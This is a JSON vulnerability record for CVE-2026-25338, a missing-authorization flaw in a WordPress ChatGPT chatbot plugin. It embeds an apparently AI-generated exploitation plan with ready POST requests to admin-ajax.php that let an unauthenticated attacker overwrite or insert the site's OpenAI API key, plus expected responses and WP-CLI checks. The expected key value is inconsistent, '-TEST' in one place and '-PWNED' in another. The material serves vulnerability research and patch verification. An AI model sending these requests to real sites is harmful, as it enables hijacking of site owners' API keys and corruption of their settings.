[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fAprU8st-h5QKEXmkSdT35PjdCUgV7prZj1IBWhssdc0":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":29,"research_verified":30,"research_rounds_completed":31,"research_plan":32,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":33,"research_started_at":34,"research_completed_at":35,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":30,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":30,"source_links":36},"CVE-2026-25338","ai-chatbot-with-chatgpt-and-content-generator-by-ays-missing-authorization-2","AI ChatBot with ChatGPT and Content Generator by AYS \u003C= 2.7.4 - Missing Authorization","The AI ChatBot with ChatGPT and Content Generator by AYS plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 2.7.4. This makes it possible for unauthenticated attackers to perform an unauthorized action.","ays-chatgpt-assistant",null,"\u003C=2.7.4","2.7.5","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-02-08 00:00:00","2026-05-04 15:44:49",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fca7e89fc-4d85-4512-9e27-e212d57e0e35?source=api-prod",86,[22,23,24,25,26,27,28],"README.txt","admin\u002Fclass-chatgpt-assistant-admin.php","admin\u002Fpartials\u002Ffeatures\u002Fchatgpt-assistant-features-display.php","chatgpt-assistant.php","includes\u002Fadmin\u002Fclass-chatgpt-assistant-upgrader.php","includes\u002Fchatgpt-assistant-db-actions\u002Fclass-chatgpt-assistant-db-actions.php","includes\u002Fchatgpt-assistant-db-actions\u002Fclass-chatgpt-assistant-embedding-db-actions.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-25338\n\n## 1. Vulnerability Summary\nThe **AI ChatBot with ChatGPT and Content Generator by AYS** plugin (version \u003C= 2.7.4) is vulnerable to **Missing Authorization**. The vulnerability exists in the `Chatgpt_Assistant_DB_Actions::store_data` function (found in `includes\u002Fchatgpt-assistant-db-actions\u002Fclass-chatgpt-assistant-db-actions.php`). This function is responsible for saving plugin settings, including the OpenAI API key, to the database. Due to a lack of capability checks (`current_user_can`) and missing nonce verification in this specific class, an unauthenticated attacker can trigger this function to overwrite sensitive plugin configuration.\n\n## 2. Attack Vector Analysis\n* **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php` (The `admin_init` hook, which typically triggers the save logic in this plugin, runs for all requests to this endpoint, regardless of authentication).\n* **HTTP Method:** `POST`\n* **Payload Parameters:**\n * `ays_chatgpt_assistant_id`: The ID of the settings record in the database (typically `1`).\n * `ays_chatgpt_assistant_api_key`: The new API key to inject.\n * `rMethod`: Set to `GET` to bypass the `wp_redirect` logic and return a simple string response.\n* **Authentication:** None required (unauthenticated).\n* **Preconditions:** The plugin must be active, and a record must exist in the `wp_ayschatgpt_data` table (created upon plugin activation).\n\n## 3. Code Flow\n1. **Entry Point:** An HTTP request is made to `\u002Fwp-admin\u002Fadmin-ajax.php`.\n2. **Hook Trigger:** WordPress fires the `admin_init` hook.\n3. **Plugin Initialization:** The plugin (likely via `ChatGPT_Assistant_Main_DB_Actions` or a handler in `Chatgpt_Assistant_Admin`) intercepts the request because `$_REQUEST` is not empty.\n4. **Vulnerable Sink:** The code calls `Chatgpt_Assistant_DB_Actions::store_data()`.\n5. **Lack of Protection:**\n * `store_data()` (lines 31-89 of `class-chatgpt-assistant-db-actions.php`) checks if `$_REQUEST` is not empty but performs **no `current_user_can()` check**.\n * Unlike the `ChatGPT_Assistant_Embedding_DB_Actions` class, this class **does not verify a nonce** (lines 36-38 are absent of any `wp_verify_nonce` calls).\n6. **Database Update:** The function executes `$wpdb->update` on the table defined by `$this->db_table` (which is `wp_ayschatgpt_data`), updating the `api_key` with the user-provided value.\n\n## 4. Nonce Acquisition Strategy\n**No nonce is required** for the primary exploitation of `Chatgpt_Assistant_DB_Actions::store_data()`. \n\nThe source code for `class-chatgpt-assistant-db-actions.php` shows that `store_data()` proceeds directly to processing `$_REQUEST` parameters without any nonce validation. This differs from `class-chatgpt-assistant-embedding-db-actions.php`, which explicitly checks for the `embedding_action` nonce.\n\n## 5. Exploitation Strategy\nThe goal is to overwrite the plugin's OpenAI API key.\n\n### HTTP Request (via `http_request` tool)\n* **URL:** `{{base_url}}\u002Fwp-admin\u002Fadmin-ajax.php`\n* **Method:** `POST`\n* **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n* **Body:**\n ```text\n ays_chatgpt_assistant_id=1&ays_chatgpt_assistant_api_key=CVE-2026-25338-PWNED&rMethod=GET\n ```\n\n### Expected Response\n* **Status:** 200 OK\n* **Body:** `updated` (This string is returned by line 82 of `class-chatgpt-assistant-db-actions.php` when `rMethod` is `GET`).\n\n## 6. Test Data Setup\n1. Ensure the plugin is activated.\n2. The plugin should automatically create a record in `wp_ayschatgpt_data` on activation. Verify its existence:\n ```bash\n wp db query \"SELECT id, api_key FROM wp_ayschatgpt_data;\"\n ```\n3. If no record exists, create one manually to simulate a configured environment:\n ```bash\n wp db query \"INSERT INTO wp_ayschatgpt_data (id, api_key, options) VALUES (1, 'original-key', '[]')\"\n ```\n\n## 7. Expected Results\n* The HTTP request should return the string `updated`.\n* The `api_key` column in the `wp_ayschatgpt_data` table for `id=1` should be changed to `CVE-2026-25338-TEST`.\n* Note: The `options` column will be overwritten with an empty JSON array `[]`, potentially breaking other plugin settings (side effect of the vulnerable function).\n\n## 8. Verification Steps\nAfter performing the HTTP request, use WP-CLI to verify the database state:\n```bash\n# Check if the API key was updated\nwp db query \"SELECT api_key FROM wp_ayschatgpt_data WHERE id = 1;\" --skip-column-names\n```\nThe output should be `CVE-2026-25338-PWNED`.\n\n## 9. Alternative Approaches\nIf `id=1` does not exist or has been changed, the attacker can attempt to `insert` a new record by setting `ays_chatgpt_assistant_id=0`:\n\n### Alternative HTTP Request (Insert)\n* **URL:** `{{base_url}}\u002Fwp-admin\u002Fadmin-ajax.php`\n* **Method:** `POST`\n* **Body:**\n ```text\n ays_chatgpt_assistant_id=0&ays_chatgpt_assistant_api_key=CVE-2026-25338-INSERTED&rMethod=GET\n ```\n* **Verification:**\n ```bash\n wp db query \"SELECT api_key FROM wp_ayschatgpt_data ORDER BY id DESC LIMIT 1;\"\n ```","gemini-3-flash-preview","2026-05-04 20:07:00","2026-05-04 20:07:45",{"type":37,"vulnerable_version":38,"fixed_version":11,"vulnerable_browse":39,"vulnerable_zip":40,"fixed_browse":41,"fixed_zip":42,"all_tags":43},"plugin","2.7.4","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fays-chatgpt-assistant\u002Ftags\u002F2.7.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fays-chatgpt-assistant.2.7.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fays-chatgpt-assistant\u002Ftags\u002F2.7.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fays-chatgpt-assistant.2.7.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fays-chatgpt-assistant\u002Ftags"]